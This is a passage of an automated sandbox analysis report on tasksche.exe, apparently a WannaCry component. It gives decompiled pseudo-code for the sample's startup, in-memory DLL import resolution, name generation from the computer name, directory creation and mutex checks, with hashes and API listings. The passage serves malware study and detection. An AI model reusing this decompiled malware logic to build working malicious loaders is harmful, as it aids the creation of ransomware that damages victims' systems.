                                                                                                                                                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                                                                                                                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                                                                                                                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3626615345-0
                                                                                                                                                • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                                                                                                                • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                                                                                                                                                • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                                                                                                                • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E00407831(CHAR* __ebx) {
				void* _t19;
				void _t21;
				intOrPtr _t28;
				signed int _t30;
				int _t32;
				intOrPtr* _t33;
				intOrPtr _t34;
				CHAR* _t35;
				intOrPtr _t38;
				intOrPtr* _t41;
				void* _t42;

				_t35 = __ebx;
				__setusermatherr(E0040793C);
				E0040792A(_t19);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t21 =  *0x40f940; // 0x0
				 *(_t42 - 0x6c) = _t21;
				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t41 =  *_acmdln;
				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
				if( *_t41 != 0x22) {
					while(1) {
						__eflags =  *_t41 - 0x20;
						if(__eflags <= 0) {
							goto L6;
						}
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				} else {
					do {
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
						_t34 =  *_t41;
					} while (_t34 != _t35 && _t34 != 0x22);
					if( *_t41 == 0x22) {
						L5:
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				}
				L6:
				_t28 =  *_t41;
				if(_t28 != _t35 && _t28 <= 0x20) {
					goto L5;
				}
				 *(_t42 - 0x30) = _t35;
				GetStartupInfoA(_t42 - 0x5c);
				_t52 =  *(_t42 - 0x30) & 0x00000001;
				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
					_t30 = 0xa;
				} else {
					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
				}
				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
				 *(_t42 - 0x68) = _t32;
				exit(_t32);
				_t33 =  *((intOrPtr*)(_t42 - 0x14));
				_t38 =  *((intOrPtr*)( *_t33));
				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
				_push(_t33);
				_push(_t38);
				L0040791E();
				return _t33;
			}














                                                                                                                                                0x00407831
                                                                                                                                                0x00407836
                                                                                                                                                0x0040783d
                                                                                                                                                0x00407842
                                                                                                                                                0x00407847
                                                                                                                                                0x0040784c
                                                                                                                                                0x00407851
                                                                                                                                                0x00407856
                                                                                                                                                0x0040786f
                                                                                                                                                0x00407875
                                                                                                                                                0x0040787a
                                                                                                                                                0x0040787f
                                                                                                                                                0x0040788c
                                                                                                                                                0x0040788e
                                                                                                                                                0x00407894
                                                                                                                                                0x004078d0
                                                                                                                                                0x004078d0
                                                                                                                                                0x004078d3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004078d5
                                                                                                                                                0x004078d6
                                                                                                                                                0x004078d6
                                                                                                                                                0x00407896
                                                                                                                                                0x00407896
                                                                                                                                                0x00407896
                                                                                                                                                0x00407897
                                                                                                                                                0x0040789a
                                                                                                                                                0x0040789c
                                                                                                                                                0x004078a7
                                                                                                                                                0x004078a9
                                                                                                                                                0x004078a9
                                                                                                                                                0x004078aa
                                                                                                                                                0x004078aa
                                                                                                                                                0x004078a7
                                                                                                                                                0x004078ad
                                                                                                                                                0x004078ad
                                                                                                                                                0x004078b1
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004078b7
                                                                                                                                                0x004078be
                                                                                                                                                0x004078c4
                                                                                                                                                0x004078c8
                                                                                                                                                0x004078dd
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078e9
                                                                                                                                                0x004078ee
                                                                                                                                                0x004078f2
                                                                                                                                                0x004078f8
                                                                                                                                                0x004078fd
                                                                                                                                                0x004078ff
                                                                                                                                                0x00407902
                                                                                                                                                0x00407903
                                                                                                                                                0x00407904
                                                                                                                                                0x0040790b

                                                                                                                                                APIs
                                                                                                                                                • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                                                                                                                                                  • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                                                                                                                                                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                                                                                                                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                                                                                                                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                                                                                                                • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                                                                                                                                                • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                                                                                                                                                • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2141228402-0
                                                                                                                                                • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                                                                                                                • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                                                                                                                                                • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                                                                                                                • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                			E004027DF(signed int* _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _t50;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t58;
				void _t60;
				signed int _t63;
				signed int _t67;
				intOrPtr _t68;
				void* _t73;
				signed int _t75;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t90 = _a4;
				_t2 = _t90 + 4; // 0x4be8563c
				_t87 =  *_t2;
				_t50 =  *_t90 + 0x80;
				_t75 = 1;
				_v16 = _t87;
				_v12 = _t75;
				if( *((intOrPtr*)(_t50 + 4)) != 0) {
					_t73 =  *_t50 + _t87;
					if(IsBadReadPtr(_t73, 0x14) != 0) {
						L25:
						return _v12;
					}
					while(1) {
						_t53 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t53 == 0) {
							goto L25;
						}
						_t8 = _t90 + 0x30; // 0xc085d0ff
						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
						_v8 = _t55;
						if(_t55 == 0) {
							SetLastError(0x7e);
							L23:
							_v12 = _v12 & 0x00000000;
							goto L25;
						}
						_t11 = _t90 + 0xc; // 0x317459c0
						_t14 = _t90 + 8; // 0x85000001
						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
						if(_t58 == 0) {
							_t40 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
							SetLastError(0xe);
							goto L23;
						}
						_t15 = _t90 + 0xc; // 0x317459c0
						 *(_t90 + 8) = _t58;
						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
						_t60 =  *_t73;
						if(_t60 == 0) {
							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
							_a4 = _t88;
						} else {
							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
							_a4 = _t60 + _t87;
						}
						while(1) {
							_t63 =  *_a4;
							if(_t63 == 0) {
								break;
							}
							if((_t63 & 0x80000000) == 0) {
								_t32 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t32);
								_t67 = _t63 + _v16 + 2;
							} else {
								_t30 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t30);
								_t67 = _t63 & 0x0000ffff;
							}
							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
							_t91 = _t91 + 0xc;
							 *_t88 = _t68;
							if(_t68 == 0) {
								_v12 = _v12 & 0x00000000;
								break;
							} else {
								_a4 =  &(_a4[1]);
								_t88 = _t88 + 4;
								continue;
							}
						}
						if(_v12 == 0) {
							_t45 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
							SetLastError(0x7f);
							goto L25;
						}
						_t73 = _t73 + 0x14;
						if(IsBadReadPtr(_t73, 0x14) == 0) {
							_t87 = _v16;
							continue;
						}
						goto L25;
					}
					goto L25;
				}
				return _t75;
			}




















                                                                                                                                                0x004027e6
                                                                                                                                                0x004027ee
                                                                                                                                                0x004027ee
                                                                                                                                                0x004027f1
                                                                                                                                                0x004027f6
                                                                                                                                                0x004027f7
                                                                                                                                                0x004027fa
                                                                                                                                                0x00402801
                                                                                                                                                0x0040280d
                                                                                                                                                0x0040281a
                                                                                                                                                0x0040291c
                                                                                                                                                0x00000000
                                                                                                                                                0x0040291f
                                                                                                                                                0x00402825
                                                                                                                                                0x00402825
                                                                                                                                                0x0040282a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402830
                                                                                                                                                0x00402836
                                                                                                                                                0x0040283a
                                                                                                                                                0x00402840
                                                                                                                                                0x004028fd
                                                                                                                                                0x004028fd
                                                                                                                                                0x00402903
                                                                                                                                                0x00000000
                                                                                                                                                0x00402903
                                                                                                                                                0x00402846
                                                                                                                                                0x00402851
                                                                                                                                                0x00402854
                                                                                                                                                0x0040285e
                                                                                                                                                0x004028f0
                                                                                                                                                0x004028f6
                                                                                                                                                0x004028fd
                                                                                                                                                0x00000000
                                                                                                                                                0x004028fd
                                                                                                                                                0x00402864
                                                                                                                                                0x0040286a
                                                                                                                                                0x0040286d
                                                                                                                                                0x00402870
                                                                                                                                                0x00402873
                                                                                                                                                0x00402877
                                                                                                                                                0x00402889
                                                                                                                                                0x0040288b
                                                                                                                                                0x00402879
                                                                                                                                                0x0040287e
                                                                                                                                                0x00402881
                                                                                                                                                0x00402881
                                                                                                                                                0x0040288e
                                                                                                                                                0x00402891
                                                                                                                                                0x00402895
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040289c
                                                                                                                                                0x004028ab
                                                                                                                                                0x004028ab
                                                                                                                                                0x004028b0
                                                                                                                                                0x0040289e
                                                                                                                                                0x0040289e
                                                                                                                                                0x0040289e
                                                                                                                                                0x004028a1
                                                                                                                                                0x004028a1
                                                                                                                                                0x004028b7
                                                                                                                                                0x004028ba
                                                                                                                                                0x004028bd
                                                                                                                                                0x004028c1
                                                                                                                                                0x004028cc
                                                                                                                                                0x00000000
                                                                                                                                                0x004028c3
                                                                                                                                                0x004028c3
                                                                                                                                                0x004028c7
                                                                                                                                                0x00000000
                                                                                                                                                0x004028c7
                                                                                                                                                0x004028c1
                                                                                                                                                0x004028d4
                                                                                                                                                0x00402909
                                                                                                                                                0x0040290f
                                                                                                                                                0x00402916
                                                                                                                                                0x00000000
                                                                                                                                                0x00402916
                                                                                                                                                0x004028d6
                                                                                                                                                0x004028e4
                                                                                                                                                0x00402822
                                                                                                                                                0x00000000
                                                                                                                                                0x00402822
                                                                                                                                                0x00000000
                                                                                                                                                0x004028ea
                                                                                                                                                0x00000000
                                                                                                                                                0x00402825
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                                                                                                                                                • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                                                                                                                                                • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Read$realloc
                                                                                                                                                • String ID: ?!@
                                                                                                                                                • API String ID: 1241503663-708128716
                                                                                                                                                • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                                                                                                                • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                                                                                                                                                • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                                                                                                                • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E00401225(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void _v410;
				long _v412;
				long _t34;
				signed int _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t71;
				signed short* _t72;
				void* _t76;
				void* _t77;

				_t34 =  *0x40f874; // 0x0
				_v412 = _t34;
				_t56 = 0x63;
				_v12 = 0x18f;
				memset( &_v410, 0, _t56 << 2);
				asm("stosw");
				GetComputerNameW( &_v412,  &_v12);
				_v8 = _v8 & 0x00000000;
				_t54 = 1;
				if(wcslen( &_v412) > 0) {
					_t72 =  &_v412;
					do {
						_t54 = _t54 * ( *_t72 & 0x0000ffff);
						_v8 = _v8 + 1;
						_t72 =  &(_t72[1]);
					} while (_v8 < wcslen( &_v412));
				}
				srand(_t54);
				_t42 = rand();
				_t71 = 0;
				asm("cdq");
				_t60 = 8;
				_t76 = _t42 % _t60 + _t60;
				if(_t76 > 0) {
					do {
						_t48 = rand();
						asm("cdq");
						_t62 = 0x1a;
						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
						_t71 = _t71 + 1;
					} while (_t71 < _t76);
				}
				_t77 = _t76 + 3;
				while(_t71 < _t77) {
					_t45 = rand();
					asm("cdq");
					_t61 = 0xa;
					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
					_t71 = _t71 + 1;
				}
				_t44 = _a4;
				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
				return _t44;
			}





















                                                                                                                                                0x0040122e
                                                                                                                                                0x00401239
                                                                                                                                                0x00401240
                                                                                                                                                0x00401249
                                                                                                                                                0x00401250
                                                                                                                                                0x00401252
                                                                                                                                                0x0040125f
                                                                                                                                                0x0040126b
                                                                                                                                                0x00401277
                                                                                                                                                0x0040127e
                                                                                                                                                0x00401280
                                                                                                                                                0x00401286
                                                                                                                                                0x00401289
                                                                                                                                                0x0040128c
                                                                                                                                                0x00401297
                                                                                                                                                0x0040129d
                                                                                                                                                0x00401286
                                                                                                                                                0x004012a1
                                                                                                                                                0x004012ae
                                                                                                                                                0x004012b2
                                                                                                                                                0x004012b4
                                                                                                                                                0x004012b5
                                                                                                                                                0x004012ba
                                                                                                                                                0x004012be
                                                                                                                                                0x004012c0
                                                                                                                                                0x004012c0
                                                                                                                                                0x004012c4
                                                                                                                                                0x004012c5
                                                                                                                                                0x004012ce
                                                                                                                                                0x004012d1
                                                                                                                                                0x004012d2
                                                                                                                                                0x004012c0
                                                                                                                                                0x004012d6
                                                                                                                                                0x004012d9
                                                                                                                                                0x004012dd
                                                                                                                                                0x004012e1
                                                                                                                                                0x004012e2
                                                                                                                                                0x004012eb
                                                                                                                                                0x004012ee
                                                                                                                                                0x004012ee
                                                                                                                                                0x004012f1
                                                                                                                                                0x004012f4
                                                                                                                                                0x004012fc

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: rand$wcslen$ComputerNamesrand
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3058258771-0
                                                                                                                                                • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                                                                                                                • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                                                                                                                                                • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                                                                                                                • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00407070(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t16 = _t31[1];
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E00407070(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}












                                                                                                                                                0x0040707a
                                                                                                                                                0x00407080
                                                                                                                                                0x00407091
                                                                                                                                                0x00407091
                                                                                                                                                0x00407097
                                                                                                                                                0x0040709a
                                                                                                                                                0x0040709e
                                                                                                                                                0x004070a5
                                                                                                                                                0x004070a7
                                                                                                                                                0x004070a9
                                                                                                                                                0x004070ab
                                                                                                                                                0x004070b1
                                                                                                                                                0x004070b1
                                                                                                                                                0x004070b3
                                                                                                                                                0x004070b6
                                                                                                                                                0x004070b7
                                                                                                                                                0x004070bd
                                                                                                                                                0x004070bf
                                                                                                                                                0x004070ca
                                                                                                                                                0x004070cf
                                                                                                                                                0x004070df
                                                                                                                                                0x004070e4
                                                                                                                                                0x004070e7
                                                                                                                                                0x004070f1
                                                                                                                                                0x004070fb
                                                                                                                                                0x00407101
                                                                                                                                                0x0040710a
                                                                                                                                                0x00407118
                                                                                                                                                0x00407121
                                                                                                                                                0x00000000
                                                                                                                                                0x0040712c
                                                                                                                                                0x00407121
                                                                                                                                                0x00407135

                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                                                                                                                                                • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                                                                                                                                                • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                                                                                                                                                • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2935503933-0
                                                                                                                                                • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                                                                                                                • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                                                                                                                                                • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                                                                                                                • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00401EFF(intOrPtr _a4) {
				char _v104;
				void* _t9;
				void* _t11;
				void* _t12;

				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
				_t12 = 0;
				if(_a4 <= 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t9 = OpenMutexA(0x100000, 1,  &_v104);
					if(_t9 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t12 = _t12 + 1;
					if(_t12 < _a4) {
						continue;
					}
					goto L3;
				}
				CloseHandle(_t9);
				_t11 = 1;
				return _t11;
			}







                                                                                                                                                0x00401f16
                                                                                                                                                0x00401f1c
                                                                                                                                                0x00401f24
                                                                                                                                                0x00401f4c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401f26
                                                                                                                                                0x00401f26
                                                                                                                                                0x00401f31
                                                                                                                                                0x00401f39
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401f40
                                                                                                                                                0x00401f46
                                                                                                                                                0x00401f4a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401f4a
                                                                                                                                                0x00401f52
                                                                                                                                                0x00401f5a
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 00401F40
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401F52
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandleMutexOpenSleepsprintf
                                                                                                                                                • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                                                                                                                                                • API String ID: 2780352083-2959021817
                                                                                                                                                • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                                                                                                                • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                                                                                                                                                • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                                                                                                                • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				void* _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _t121;
				int _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				int _t131;
				intOrPtr* _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				signed int _t150;
